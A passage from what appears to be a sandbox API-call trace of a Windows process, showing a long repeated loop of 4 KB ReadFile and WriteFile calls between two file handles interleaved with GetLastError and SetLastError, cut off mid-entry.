ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.681] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.687] GetLastError () returned 0x0 [0093.709] SetLastError (dwErrCode=0x0) [0093.709] GetLastError () returned 0x0 [0093.709] SetLastError (dwErrCode=0x0) [0093.709] GetLastError () returned 0x0 [0093.709] SetLastError (dwErrCode=0x0) [0093.709] GetLastError () returned 0x0 [0093.709] SetLastError (dwErrCode=0x0) [0093.710] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.710] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.710] GetLastError () returned 0x0 [0093.710] SetLastError (dwErrCode=0x0) [0093.710] GetLastError () returned 0x0 [0093.710] SetLastError (dwErrCode=0x0) [0093.710] GetLastError () returned 0x0 [0093.710] SetLastError (dwErrCode=0x0) [0093.710] GetLastError () returned 0x0 [0093.710] SetLastError (dwErrCode=0x0) [0093.710] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.711] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.711] GetLastError () returned 0x0 [0093.711] SetLastError (dwErrCode=0x0) [0093.711] GetLastError () returned 0x0 [0093.711] SetLastError (dwErrCode=0x0) [0093.711] GetLastError () returned 0x0 [0093.711] SetLastError (dwErrCode=0x0) [0093.711] GetLastError () returned 0x0 [0093.711] SetLastError (dwErrCode=0x0) [0093.711] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.712] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.712] GetLastError () returned 0x0 [0093.712] SetLastError (dwErrCode=0x0) [0093.712] GetLastError () returned 0x0 [0093.712] SetLastError (dwErrCode=0x0) [0093.712] GetLastError () returned 0x0 [0093.712] SetLastError (dwErrCode=0x0) [0093.712] GetLastError () returned 0x0 [0093.712] SetLastError (dwErrCode=0x0) [0093.712] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.712] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.713] GetLastError () returned 0x0 [0093.713] SetLastError (dwErrCode=0x0) [0093.713] GetLastError () returned 0x0 [0093.713] SetLastError (dwErrCode=0x0) [0093.713] GetLastError () returned 0x0 [0093.713] SetLastError (dwErrCode=0x0) [0093.713] GetLastError () returned 0x0 [0093.713] SetLastError (dwErrCode=0x0) [0093.713] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.713] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.714] GetLastError () returned 0x0 [0093.714] SetLastError (dwErrCode=0x0) [0093.714] GetLastError () returned 0x0 [0093.714] SetLastError (dwErrCode=0x0) [0093.714] GetLastError () returned 0x0 [0093.714] SetLastError (dwErrCode=0x0) [0093.714] GetLastError () returned 0x0 [0093.714] SetLastError (dwErrCode=0x0) [0093.714] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.714] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.714] GetLastError () returned 0x0 [0093.714] SetLastError (dwErrCode=0x0) [0093.715] GetLastError () returned 0x0 [0093.715] SetLastError (dwErrCode=0x0) [0093.715] GetLastError () returned 0x0 [0093.715] SetLastError (dwErrCode=0x0) [0093.715] GetLastError () returned 0x0 [0093.715] SetLastError (dwErrCode=0x0) [0093.715] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.715] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.715] GetLastError () returned 0x0 [0093.715] SetLastError (dwErrCode=0x0) [0093.715] GetLastError () returned 0x0 [0093.715] SetLastError (dwErrCode=0x0) [0093.715] GetLastError () returned 0x0 [0093.716] SetLastError (dwErrCode=0x0) [0093.716] GetLastError () returned 0x0 [0093.716] SetLastError (dwErrCode=0x0) [0093.716] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.716] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.716] GetLastError () returned 0x0 [0093.716] SetLastError (dwErrCode=0x0) [0093.716] GetLastError () returned 0x0 [0093.716] SetLastError (dwErrCode=0x0) [0093.716] GetLastError () returned 0x0 [0093.716] SetLastError (dwErrCode=0x0) [0093.716] GetLastError () returned 0x0 [0093.717] SetLastError (dwErrCode=0x0) [0093.717] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.717] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.717] GetLastError () returned 0x0 [0093.717] SetLastError (dwErrCode=0x0) [0093.717] GetLastError () returned 0x0 [0093.717] SetLastError (dwErrCode=0x0) [0093.717] GetLastError () returned 0x0 [0093.717] SetLastError (dwErrCode=0x0) [0093.717] GetLastError () returned 0x0 [0093.717] SetLastError (dwErrCode=0x0) [0093.717] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.718] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.718] GetLastError () returned 0x0 [0093.718] SetLastError (dwErrCode=0x0) [0093.718] GetLastError () returned 0x0 [0093.718] SetLastError (dwErrCode=0x0) [0093.718] GetLastError () returned 0x0 [0093.718] SetLastError (dwErrCode=0x0) [0093.718] GetLastError () returned 0x0 [0093.718] SetLastError (dwErrCode=0x0) [0093.718] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.718] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.719] GetLastError () returned 0x0 [0093.719] SetLastError (dwErrCode=0x0) [0093.719] GetLastError () returned 0x0 [0093.719] SetLastError (dwErrCode=0x0) [0093.719] GetLastError () returned 0x0 [0093.719] SetLastError (dwErrCode=0x0) [0093.719] GetLastError () returned 0x0 [0093.719] SetLastError (dwErrCode=0x0) [0093.719] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.719] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.719] GetLastError () returned 0x0 [0093.719] SetLastError (dwErrCode=0x0) [0093.719] GetLastError () returned 0x0 [0093.719] SetLastError (dwErrCode=0x0) [0093.719] GetLastError () returned 0x0 [0093.719] SetLastError (dwErrCode=0x0) [0093.719] GetLastError () returned 0x0 [0093.719] SetLastError (dwErrCode=0x0) [0093.719] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.720] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.720] GetLastError () returned 0x0 [0093.720] SetLastError (dwErrCode=0x0) [0093.720] GetLastError () returned 0x0 [0093.720] SetLastError (dwErrCode=0x0) [0093.720] GetLastError () returned 0x0 [0093.720] SetLastError (dwErrCode=0x0) [0093.720] GetLastError () returned 0x0 [0093.720] SetLastError (dwErrCode=0x0) [0093.720] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.720] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.720] GetLastError () returned 0x0 [0093.720] SetLastError (dwErrCode=0x0) [0093.720] GetLastError () returned 0x0 [0093.720] SetLastError (dwErrCode=0x0) [0093.720] GetLastError () returned 0x0 [0093.720] SetLastError (dwErrCode=0x0) [0093.720] GetLastError () returned 0x0 [0093.720] SetLastError (dwErrCode=0x0) [0093.720] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.721] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.721] GetLastError () returned 0x0 [0093.721] SetLastError (dwErrCode=0x0) [0093.721] GetLastError () returned 0x0 [0093.721] SetLastError (dwErrCode=0x0) [0093.721] GetLastError () returned 0x0 [0093.721] SetLastError (dwErrCode=0x0) [0093.721] GetLastError () returned 0x0 [0093.721] SetLastError (dwErrCode=0x0) [0093.721] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.721] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.721] GetLastError () returned 0x0 [0093.721] SetLastError (dwErrCode=0x0) [0093.721] GetLastError () returned 0x0 [0093.721] SetLastError (dwErrCode=0x0) [0093.721] GetLastError () returned 0x0 [0093.721] SetLastError (dwErrCode=0x0) [0093.721] GetLastError () returned 0x0 [0093.721] SetLastError (dwErrCode=0x0) [0093.721] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.722] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.722] GetLastError () returned 0x0 [0093.722] SetLastError (dwErrCode=0x0) [0093.722] GetLastError () returned 0x0 [0093.722] SetLastError (dwErrCode=0x0) [0093.722] GetLastError () returned 0x0 [0093.722] SetLastError (dwErrCode=0x0) [0093.722] GetLastError () returned 0x0 [0093.722] SetLastError (dwErrCode=0x0) [0093.722] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.722] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.722] GetLastError () returned 0x0 [0093.722] SetLastError (dwErrCode=0x0) [0093.722] GetLastError () returned 0x0 [0093.722] SetLastError (dwErrCode=0x0) [0093.722] GetLastError () returned 0x0 [0093.722] SetLastError (dwErrCode=0x0) [0093.722] GetLastError () returned 0x0 [0093.722] SetLastError (dwErrCode=0x0) [0093.722] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.723] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.723] GetLastError () returned 0x0 [0093.723] SetLastError (dwErrCode=0x0) [0093.723] GetLastError () returned 0x0 [0093.723] SetLastError (dwErrCode=0x0) [0093.723] GetLastError () returned 0x0 [0093.723] SetLastError (dwErrCode=0x0) [0093.723] GetLastError () returned 0x0 [0093.723] SetLastError (dwErrCode=0x0) [0093.723] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.723] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.723] GetLastError () returned 0x0 [0093.723] SetLastError (dwErrCode=0x0) [0093.723] GetLastError () returned 0x0 [0093.723] SetLastError (dwErrCode=0x0) [0093.723] GetLastError () returned 0x0 [0093.723] SetLastError (dwErrCode=0x0) [0093.723] GetLastError () returned 0x0 [0093.724] SetLastError (dwErrCode=0x0) [0093.724] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.724] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.724] GetLastError () returned 0x0 [0093.724] SetLastError (dwErrCode=0x0) [0093.724] GetLastError () returned 0x0 [0093.724] SetLastError (dwErrCode=0x0) [0093.724] GetLastError () returned 0x0 [0093.724] SetLastError (dwErrCode=0x0) [0093.724] GetLastError () returned 0x0 [0093.724] SetLastError (dwErrCode=0x0) [0093.724] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.724] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.724] GetLastError () returned 0x0 [0093.724] SetLastError (dwErrCode=0x0) [0093.724] GetLastError () returned 0x0 [0093.724] SetLastError (dwErrCode=0x0) [0093.724] GetLastError () returned 0x0 [0093.725] SetLastError (dwErrCode=0x0) [0093.725] GetLastError () returned 0x0 [0093.725] SetLastError (dwErrCode=0x0) [0093.725] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.725] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.725] GetLastError () returned 0x0 [0093.725] SetLastError (dwErrCode=0x0) [0093.725] GetLastError () returned 0x0 [0093.725] SetLastError (dwErrCode=0x0) [0093.725] GetLastError () returned 0x0 [0093.725] SetLastError (dwErrCode=0x0) [0093.725] GetLastError () returned 0x0 [0093.725] SetLastError (dwErrCode=0x0) [0093.725] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.725] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.725] GetLastError () returned 0x0 [0093.725] SetLastError (dwErrCode=0x0) [0093.725] GetLastError () returned 0x0 [0093.726] SetLastError (dwErrCode=0x0) [0093.726] GetLastError () returned 0x0 [0093.726] SetLastError (dwErrCode=0x0) [0093.726] GetLastError () returned 0x0 [0093.726] SetLastError (dwErrCode=0x0) [0093.726] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.726] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.726] GetLastError () returned 0x0 [0093.726] SetLastError (dwErrCode=0x0) [0093.726] GetLastError () returned 0x0 [0093.726] SetLastError (dwErrCode=0x0) [0093.726] GetLastError () returned 0x0 [0093.726] SetLastError (dwErrCode=0x0) [0093.726] GetLastError () returned 0x0 [0093.726] SetLastError (dwErrCode=0x0) [0093.726] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.726] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.726] GetLastError () returned 0x0 [0093.727] SetLastError (dwErrCode=0x0) [0093.727] GetLastError () returned 0x0 [0093.727] SetLastError (dwErrCode=0x0) [0093.727] GetLastError () returned 0x0 [0093.727] SetLastError (dwErrCode=0x0) [0093.727] GetLastError () returned 0x0 [0093.727] SetLastError (dwErrCode=0x0) [0093.727] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.727] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.727] GetLastError () returned 0x0 [0093.727] SetLastError (dwErrCode=0x0) [0093.727] GetLastError () returned 0x0 [0093.727] SetLastError (dwErrCode=0x0) [0093.727] GetLastError () returned 0x0 [0093.727] SetLastError (dwErrCode=0x0) [0093.727] GetLastError () returned 0x0 [0093.727] SetLastError (dwErrCode=0x0) [0093.727] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.727] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.728] GetLastError () returned 0x0 [0093.728] SetLastError (dwErrCode=0x0) [0093.728] GetLastError () returned 0x0 [0093.728] SetLastError (dwErrCode=0x0) [0093.728] GetLastError () returned 0x0 [0093.728] SetLastError (dwErrCode=0x0) [0093.728] GetLastError () returned 0x0 [0093.728] SetLastError (dwErrCode=0x0) [0093.728] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.728] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.728] GetLastError () returned 0x0 [0093.728] SetLastError (dwErrCode=0x0) [0093.728] GetLastError () returned 0x0 [0093.728] SetLastError (dwErrCode=0x0) [0093.728] GetLastError () returned 0x0 [0093.728] SetLastError (dwErrCode=0x0) [0093.728] GetLastError () returned 0x0 [0093.728] SetLastError (dwErrCode=0x0) [0093.729] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.729] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.729] GetLastError () returned 0x0 [0093.729] SetLastError (dwErrCode=0x0) [0093.729] GetLastError () returned 0x0 [0093.729] SetLastError (dwErrCode=0x0) [0093.729] GetLastError () returned 0x0 [0093.729] SetLastError (dwErrCode=0x0) [0093.729] GetLastError () returned 0x0 [0093.729] SetLastError (dwErrCode=0x0) [0093.729] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0093.729] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0093.729] GetLastError () returned 0x0 [0093.729] SetLastError (dwErrCode=0x0) [0093.729] GetLastError () returned 0x0 [0093.729] SetLastError (dwErrCode=0x0) [0093.729] GetLastError () returned 0x0 [0093.730] SetLastError (dwErrCode=0x0) [0093.730] GetLastError () returned 0x0 [0093.730] SetLastError (dwErrCode=0x0) [0093.730] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, 